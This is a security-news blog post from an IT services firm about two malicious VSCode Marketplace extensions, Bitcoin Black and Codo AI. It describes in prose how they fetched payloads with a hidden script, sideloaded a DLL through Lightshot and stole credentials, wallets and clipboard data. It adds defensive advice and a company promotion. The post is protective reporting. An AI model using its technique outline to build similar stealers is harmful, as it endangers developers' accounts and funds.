Malicious VSCode Extensions Infiltrate Microsoft’s Registry with Information-Stealing Malware

🎙️ Dive Deeper with Our Podcast!

The cybersecurity landscape for software developers took a dangerous turn this week as security researchers uncovered two malicious extensions lurking within Microsoft’s Visual Studio Code Marketplace. These sophisticated threats, masquerading as legitimate productivity tools, are designed to infiltrate developers’ workstations and exfiltrate sensitive information ranging from credentials and cryptocurrency wallets to browser sessions and system data.

The Growing Threat to Development Environments

Visual Studio Code (VSCode) has become one of the most popular integrated development environments (IDEs) among software developers worldwide. Its extensibility through the VSCode Marketplace allows developers to customize their workflow with thousands of extensions. However, this same extensibility has become an attack vector that cybercriminals are increasingly exploiting to target the developer community.

The discovery of these malicious extensions highlights a critical vulnerability in the software supply chain—when the tools developers use to build applications become compromised, the ramifications extend far beyond individual machines to potentially affect entire software ecosystems and the organizations that depend on them.

Identifying the Malicious Extensions: Bitcoin Black and Codo AI

Security researchers at Koi Security identified two particularly insidious extensions published under the developer name ‘BigBlack’ on Microsoft’s official VSCode Marketplace. The extensions, named Bitcoin Black and Codo AI, employed social engineering tactics to appear legitimate while harboring dangerous payload delivery mechanisms.

Bitcoin Black presented itself as a simple color theme for VSCode, while Codo AI masqueraded as an AI-powered coding assistant—tools that developers commonly seek to enhance their productivity and customize their development environment. At the time of discovery, Codo AI remained available in the marketplace with fewer than 30 downloads, while Bitcoin Black’s counter showed only one installation.

The relatively low download counts suggest these threats were either recently deployed or part of a targeted campaign rather than a widespread attack. Nevertheless, even limited infections in development environments can have cascading consequences, particularly if compromised developers work on software that reaches end users or enterprise systems.

How the Malicious Extensions Operate

Initial Infection Vector

The Bitcoin Black extension utilized a particularly concerning activation mechanism—a universal activation event denoted by an asterisk (*) that triggers execution on every VSCode action. This means the malicious code would run continuously during normal development activities, providing persistent access to the compromised system without requiring specific user actions beyond the initial installation.

Additionally, Bitcoin Black included the capability to execute PowerShell code, a functionality that serves no legitimate purpose for a color theme extension and should have raised immediate red flags during any security review process. This capability allowed the extension to serve as a gateway for downloading and executing additional malicious payloads.

Evolution of the Attack Methodology

Earlier versions of the Bitcoin Black extension employed a PowerShell script to download a password-protected archived payload. However, this approach had a significant weakness from an attacker’s perspective—it created a visible PowerShell window that could alert suspicious users to unauthorized activity.

The threat actors behind these extensions quickly adapted their tactics. More recent versions switched to a batch script (bat.sh) that leverages the curl command to download both a DLL file and an executable. Critically, this updated approach executes with the window hidden, eliminating the visual indicator that might have warned users of malicious activity occurring in the background.

The Codo AI Deception

The Codo AI extension represented a more sophisticated approach to social engineering. According to security researcher Idan Dardikman of Koi Security, the extension actually includes functional code assistance capabilities that integrate with ChatGPT or DeepSeek—popular AI coding assistants. This legitimate functionality serves as camouflage for the malicious components embedded within the extension, making it harder for users to identify the threat based on observed behavior alone.

Technical Analysis of the Information Stealer

DLL Hijacking Technique

Both malicious extensions deliver their ultimate payload through a technique known as DLL hijacking. This attack method exploits the way Windows applications load Dynamic Link Library (DLL) files by placing a malicious DLL in a location where a legitimate application will load it instead of the intended library.

In this campaign, the attackers bundle a legitimate executable of Lightshot, a popular screenshot tool, alongside a malicious DLL file. When the Lightshot executable runs, it loads the malicious DLL, which then deploys the actual information-stealing malware under the process name runtime.exe. This technique provides stealth and legitimacy to the malicious process, as it appears to be associated with a known, trusted application.

The malicious DLL demonstrates concerning detection rates on virus scanning platforms. Analysis through VirusTotal revealed that 29 out of 72 antivirus engines flagged the DLL as malicious—significant, but far from universal detection. This partial detection rate means that many security solutions would fail to identify the threat, allowing it to operate undetected on protected systems.

Data Exfiltration Capabilities

Once successfully deployed, the information stealer creates a sophisticated infrastructure for collecting and organizing stolen data. The malware establishes a directory within the Windows AppData folder (%APPDATA%\Local) and creates a subdirectory named “Evelyn” specifically for storing exfiltrated information.

The range of data targeted by this malware is comprehensive and reflects a deep understanding of what information holds value on developer workstations:

System Intelligence: The malware collects detailed information about running processes, installed programs, and system specifications. This intelligence helps attackers understand the victim’s environment and identify high-value targets or opportunities for further exploitation.

Credential Harvesting: The stealer actively searches for stored passwords and credentials across various applications and services. For developers, these credentials often provide access to code repositories, cloud services, and production environments—making them extraordinarily valuable to threat actors.

Network Information: WiFi credentials stored on the system are exfiltrated, potentially providing attackers with information to conduct further attacks against the victim’s network infrastructure or impersonate the victim on trusted networks.

Clipboard Monitoring: By capturing clipboard content, the malware can intercept passwords, cryptocurrency addresses, authentication codes, and other sensitive data that users copy and paste during normal work activities.

Screenshot Capability: The malware can capture screenshots of the victim’s desktop, potentially revealing sensitive information displayed in applications, code being developed, or confidential communications.

Browser Session Hijacking

Cryptocurrency Wallet Targeting

The malware specifically targets popular cryptocurrency wallets, including Phantom, Metamask, and Exodus. As cryptocurrency adoption has grown among technology professionals and developers, these wallets have become common targets for cybercriminals.

Cryptocurrency wallets often contain not just digital assets but also private keys and seed phrases that provide complete control over funds. Unlike traditional financial accounts, cryptocurrency transactions are irreversible, and there’s no central authority to appeal to for recovery of stolen funds. This makes cryptocurrency wallets particularly lucrative targets for information stealers.

The Broader Context of VSCode Extension Threats

The Glassworm Campaign and Historical Precedent

The Bitcoin Black and Codo AI extensions are not isolated incidents but part of a growing pattern of attacks targeting VSCode extension platforms. One of the most notable previous campaigns, dubbed Glassworm, demonstrated the potential scale and sophistication of attacks against developer tool ecosystems.

Malicious extensions have appeared not only on Microsoft’s official VSCode Marketplace but also on alternative platforms like OpenVSX, which provides extensions for VSCode-compatible IDEs. This multi-platform presence indicates that threat actors view the VSCode ecosystem as a valuable attack surface worth sustained investment and effort.

Why Developers Make Attractive Targets

Developers represent high-value targets for several compelling reasons that make them disproportionately attractive to cybercriminals:

Access to Source Code: Compromising a developer’s workstation can provide access to proprietary source code, intellectual property, and trade secrets. For competitors or nation-state actors engaged in economic espionage, this access is invaluable.

Supply Chain Position: Developers sit at a critical point in the software supply chain. Code they write and systems they access can affect thousands or millions of downstream users. Compromising a developer can enable supply chain attacks with massive reach.

Elevated Privileges: Developers typically require extensive system permissions and access to production environments, databases, and cloud infrastructure. A compromised developer account can provide attackers with privileged access throughout an organization’s technology stack.

Cryptocurrency Holdings: The technology community has higher-than-average cryptocurrency adoption rates, making developers more likely to have valuable digital assets stored on their workstations.

Valuable Credentials: Developers maintain access to numerous high-value systems including code repositories (GitHub, GitLab, Bitbucket), cloud platforms (AWS, Azure, GCP), container registries, API keys, and deployment systems.

Microsoft’s Marketplace Security Challenges

The presence of malicious extensions on Microsoft’s official marketplace raises important questions about the vetting and security review processes for submitted extensions. While Microsoft maintains some level of review for marketplace submissions, the approval of these clearly malicious extensions suggests gaps in the security validation process.

Several factors make marketplace security particularly challenging:

Volume of Submissions: Popular extension marketplaces receive numerous submissions daily, making comprehensive manual review of every extension impractical without significant resource investment.

Sophisticated Obfuscation: Attackers increasingly employ sophisticated code obfuscation techniques and delayed payload delivery to evade automated scanning tools and cursory code reviews.

Legitimate Functionality Camouflage: As demonstrated by Codo AI, malicious extensions can include genuine, useful functionality that obscures malicious components and makes behavioral analysis more difficult.

Evolution After Approval: Extensions can be updated after initial approval, potentially allowing attackers to publish a benign initial version and subsequently update it with malicious functionality.

Security Best Practices for VSCode Users

Vetting Extension Publishers

When installing VSCode extensions, developers should implement a careful evaluation process:

Publisher Reputation: Install extensions only from well-established publishers with a track record of legitimate contributions to the developer community. Check the publisher’s profile for other extensions they’ve published and look for evidence of sustained, professional development activity.

Download Metrics: While not foolproof, extension download counts can provide useful signals. Extensions with very low download counts from unknown publishers warrant extra scrutiny, particularly if they claim to provide functionality similar to popular existing extensions.

Review History: Examine user reviews and ratings, paying particular attention to recent reviews that might indicate newly introduced issues or suspicious behavior. Be skeptical of extensions with overwhelmingly positive reviews from accounts with limited history, as these can be fabricated.

Last Updated Date: Extensions that haven’t been updated in extended periods may contain security vulnerabilities or be abandoned by their developers. Conversely, be cautious of brand-new extensions from unknown publishers, especially if they request extensive permissions.

Understanding Extension Permissions

VSCode extensions declare the permissions and capabilities they require. Before installing an extension, developers should:

Review Activation Events: Be immediately suspicious of extensions using universal activation events (*) unless there’s a clear, legitimate reason for the extension to run continuously. Most extensions should only activate for specific file types, commands, or workspace conditions.

Evaluate Required Capabilities: Consider whether the permissions requested align with the extension’s stated functionality. A color theme should never require the ability to execute shell commands or access the file system extensively.

Examine Marketplace Listings: Read the extension description thoroughly and look for vague functionality claims, poor documentation, or unprofessional presentation—all potential red flags for malicious or low-quality extensions.

Organizational Security Measures

For organizations employing software developers, additional protective measures should be implemented:

Extension Allowlists: Consider implementing organizational policies that restrict extension installation to a curated allowlist of approved extensions that have undergone security review.

Developer Workstation Segmentation: Implement network segmentation and access controls that limit the potential damage if a developer workstation becomes compromised. Developers shouldn’t have unrestricted access to production environments directly from their development machines.

Endpoint Detection and Response: Deploy EDR solutions that can detect suspicious behavior patterns associated with information stealers, such as headless browser execution, unusual data staging activities, or unauthorized credential access.

Regular Security Awareness Training: Educate development teams about the risks associated with development tool compromise and the importance of following extension vetting procedures.

The Evolving Threat Landscape

The sophistication of these malicious VSCode extensions reflects broader trends in the cybersecurity threat landscape:

Developer-Focused Attacks: Threat actors increasingly recognize the value of targeting developers and the software development lifecycle rather than focusing exclusively on end-user systems or servers.

Supply Chain Exploitation: Compromising development tools and environments provides opportunities for supply chain attacks that can affect vast numbers of downstream users.

Living-off-the-Land Techniques: By leveraging legitimate tools like Lightshot and hijacking their functionality, attackers reduce their forensic footprint and evade security tools looking for obviously malicious executables.

Multi-Stage Payload Delivery: The evolution from visible PowerShell windows to hidden batch script execution demonstrates how attackers continuously refine their techniques based on what defensive measures they encounter.

Frequently Asked Questions

How can I check if I’ve installed the malicious Bitcoin Black or Codo AI extensions?

Open VSCode and navigate to the Extensions view (Ctrl+Shift+X or Cmd+Shift+X on Mac). Search for “Bitcoin Black” and “Codo AI” in your installed extensions. If you find either extension installed, uninstall them immediately. Run a comprehensive antivirus scan of your system.

Additionally, check your %APPDATA%\Local\ directory for a folder named “Evelyn.” The malware uses this folder to store stolen data. If you discover either extension was installed, immediately change passwords for all critical accounts. Consider your system potentially compromised.

What should I do if I’ve already installed one of these malicious extensions?

If you’ve installed either Bitcoin Black or Codo AI, take immediate action. First, completely disconnect your computer from the internet. This prevents further data exfiltration. Uninstall the malicious extension through VSCode’s extension manager.

Run a full system scan with updated antivirus software. Preferably use multiple scanning tools for comprehensive detection. Change all passwords from a different, known-clean device. Prioritize accounts with access to sensitive systems, code repositories, and financial accounts.

Enable multi-factor authentication on all critical accounts. Consider that your cryptocurrency wallets may be compromised. Take appropriate action to secure any digital assets. Finally, contact your organization’s IT security team if this occurred on a work device. The compromise may have implications for corporate systems and data.

Are malicious extensions common on the VSCode Marketplace?

While Microsoft maintains security measures for the VSCode Marketplace, malicious extensions do occasionally appear. Campaigns like Glassworm and the recently discovered Bitcoin Black and Codo AI threats demonstrate this. However, given the thousands of legitimate extensions available and the millions of installations, malicious extensions represent a small minority.

The risk increases when installing extensions from unknown publishers with limited track records or suspiciously low download counts. Microsoft actively removes malicious extensions when discovered. However, users should not rely solely on marketplace security. They should implement their own vetting procedures before installing any extension.

What permissions should raise red flags when installing a VSCode extension?

Several permission requests should prompt careful evaluation before installation. Universal activation events (denoted by “*”) mean the extension will run on every VSCode action. Legitimate extensions rarely need this capability.

The ability to execute shell commands or PowerShell scripts is unnecessary for most extensions. This is particularly true for those claiming to be themes or simple utilities. Broad file system access beyond what’s clearly required for the extension’s stated functionality warrants scrutiny.

Network access permissions should align with the extension’s purpose. An offline color theme shouldn’t need internet connectivity, for example. Finally, be cautious of extensions requesting access to execute binary files or modify system settings. These capabilities can facilitate malware deployment.

How effective is antivirus software at detecting these threats?

Detection rates for the malicious DLL used in these extensions showed that approximately 40% of antivirus engines (29 out of 72 tested) successfully identified the threat. This partial detection rate is common for newly deployed malware. Such threats haven’t yet been widely analyzed and added to antivirus signature databases.

This underscores an important reality: antivirus software provides valuable protection but should not be considered a complete security solution. Organizations and individual developers should implement defense-in-depth strategies. These should include not only antivirus software but also application allowlisting, behavior-based detection through EDR solutions, network monitoring, and—critically—user education and awareness about threats targeting development environments.

Can these malicious extensions steal data from containers or virtual machines running on my system?

The primary target of these information stealers is the host operating system where VSCode runs. However, depending on how containers and virtual machines are configured, there could be risk of data exposure.

If you share file systems between your host and containers/VMs, or if you’ve configured network bridges that allow unrestricted communication, the malware could potentially access exposed resources. Additionally, if you copy and paste credentials or other sensitive data between your host system and virtualized environments, the clipboard monitoring functionality could capture that information.

The screenshot capability could also capture whatever is visible on your display. This includes terminal windows showing virtual machine or container operations. For maximum security isolation, avoid sharing credentials between host and virtualized environments. Use separate credential management systems and implement proper network segmentation.

What makes developer tools particularly attractive targets for cybercriminals?

Developer tools represent high-value targets because they operate at a privileged position within organizational security boundaries. Developers typically have access to source code repositories containing proprietary intellectual property and trade secrets. They maintain credentials for production systems, cloud platforms, and critical infrastructure.

Because development work requires flexibility and broad access, developers often operate with fewer restrictions than other users. Compromising a developer’s workstation can enable supply chain attacks. Malicious code can be introduced into software that will be distributed to thousands or millions of end users.

Additionally, the developer community has higher-than-average cryptocurrency adoption. This makes them lucrative targets for financial theft. The technical sophistication of developers sometimes creates a false sense of security. They may be less likely to suspect that tools specifically designed for developers could be malicious.

How can organizations protect their development teams from these threats?

Organizations should implement a multi-layered security approach for development environments. Establish and enforce policies requiring extensions to be installed only from a curated allowlist of pre-approved, vetted extensions.

Implement endpoint detection and response (EDR) solutions capable of identifying suspicious behaviors. These include headless browser execution or unusual data staging activities. Segment development networks from production environments. Implement principle of least privilege access controls.

Require multi-factor authentication for all systems developers can access. This is particularly important for code repositories and cloud infrastructure. Conduct regular security awareness training focused on threats specific to development environments.

Consider implementing application allowlisting to prevent unauthorized executables from running. Deploy Data Loss Prevention (DLP) solutions to monitor and control sensitive data movement. Finally, establish incident response procedures specifically addressing scenarios where developer workstations or development tools become compromised.

How Technijian Can Help

The discovery of malicious extensions in Microsoft’s VSCode Marketplace highlights the sophisticated and evolving threats targeting software development environments. As cybercriminals increasingly recognize the value of compromising developers and their tools, organizations need comprehensive security strategies specifically designed to protect development teams and the software supply chain.

Comprehensive Security Assessments for Development Environments: Technijian’s cybersecurity experts conduct thorough evaluations of your development infrastructure, identifying vulnerabilities in your IDE configurations, extension management practices, and developer workstation security posture. We assess your current security controls and provide actionable recommendations for strengthening protection against supply chain attacks and developer-targeted threats.

Managed Endpoint Detection and Response: Our managed EDR services provide continuous monitoring of developer workstations with advanced behavioral analytics capable of detecting sophisticated threats like information stealers, even when they employ obfuscation or living-off-the-land techniques. We identify suspicious activities such as headless browser execution, unusual data staging, and unauthorized credential access—the exact behaviors exhibited by malicious extensions like Bitcoin Black and Codo AI.

Security Policy Development and Enforcement: Technijian helps organizations implement practical security policies for development teams, including extension allowlist management, secure coding practices, and access control frameworks. We balance security requirements with developer productivity, creating policies that protect your organization without unnecessarily hindering development workflows.

Incident Response and Forensic Investigation: If your organization has been affected by malicious extensions or suspects developer workstation compromise, Technijian’s incident response team provides rapid investigation and remediation services. We contain the threat, assess the scope of compromise, recover affected systems, and implement measures to prevent recurrence.

Security Awareness Training for Technical Teams: Our specialized training programs educate developers and IT teams about threats specific to development environments, including malicious IDE extensions, supply chain attacks, and social engineering tactics targeting technical professionals. We provide practical guidance on extension vetting, secure development practices, and recognizing sophisticated threats.

Network Segmentation and Access Control Implementation: Technijian designs and implements network architectures that limit the potential impact of compromised developer workstations. We establish appropriate segmentation between development, staging, and production environments, implement privilege management solutions, and configure access controls that follow least-privilege principles.

As threat actors continue refining their attacks against development environments, partnering with experienced cybersecurity professionals becomes essential for protecting your organization’s intellectual property, infrastructure, and reputation. Technijian brings over two decades of managed IT services experience serving businesses throughout Orange County and Southern California, with deep expertise in cybersecurity, threat detection, and incident response.

Contact Technijian today to schedule a comprehensive security assessment of your development environment and discover how our managed cybersecurity services can protect your development teams from sophisticated threats targeting the software supply chain. Don’t wait for a compromise to reveal vulnerabilities—proactive security measures implemented today protect your organization’s most valuable assets tomorrow.

About Technijian

Technijian is a premier Managed IT Services provider in Irvine, specializing in delivering secure, scalable, and innovative AI and technology solutions across Orange County and Southern California. Founded in 2000 by Ravi Jain, what started as a one-man IT shop has evolved into a trusted technology partner with teams of engineers, AI specialists, and cybersecurity professionals both in the U.S. and internationally.

Headquartered in Irvine, we provide comprehensive cybersecurity solutions, IT support, AI implementation services, and cloud services throughout Orange County—from Aliso Viejo, Anaheim, Costa Mesa, and Fountain Valley to Newport Beach, Santa Ana, Tustin, and beyond. Our extensive experience with enterprise security deployments, combined with our deep understanding of local business needs, makes us the ideal partner for organizations seeking to implement security solutions that provide real protection.

We work closely with clients across diverse industries, including healthcare, finance, law, retail, and professional services, to design security strategies that reduce risk, enhance productivity, and maintain the highest protection standards. Our Irvine-based office remains our primary hub, delivering the personalized service and responsive support that businesses across Orange County have relied on for over two decades.

With expertise spanning cybersecurity, managed IT services, AI implementation, consulting, and cloud solutions, Technijian has become the go-to partner for small to medium businesses seeking reliable technology infrastructure and comprehensive security capabilities. Whether you need Cisco Umbrella deployment in Irvine, DNS security implementation in Santa Ana, or phishing prevention consulting in Anaheim, we deliver technology solutions that align with your business goals and security requirements.

Partner with Technijian and experience the difference of a local IT company that combines global security expertise with community-driven service. Our mission is to help businesses across Irvine, Orange County, and Southern California harness the power of advanced cybersecurity to stay protected, efficient, and competitive in today’s threat-filled digital world.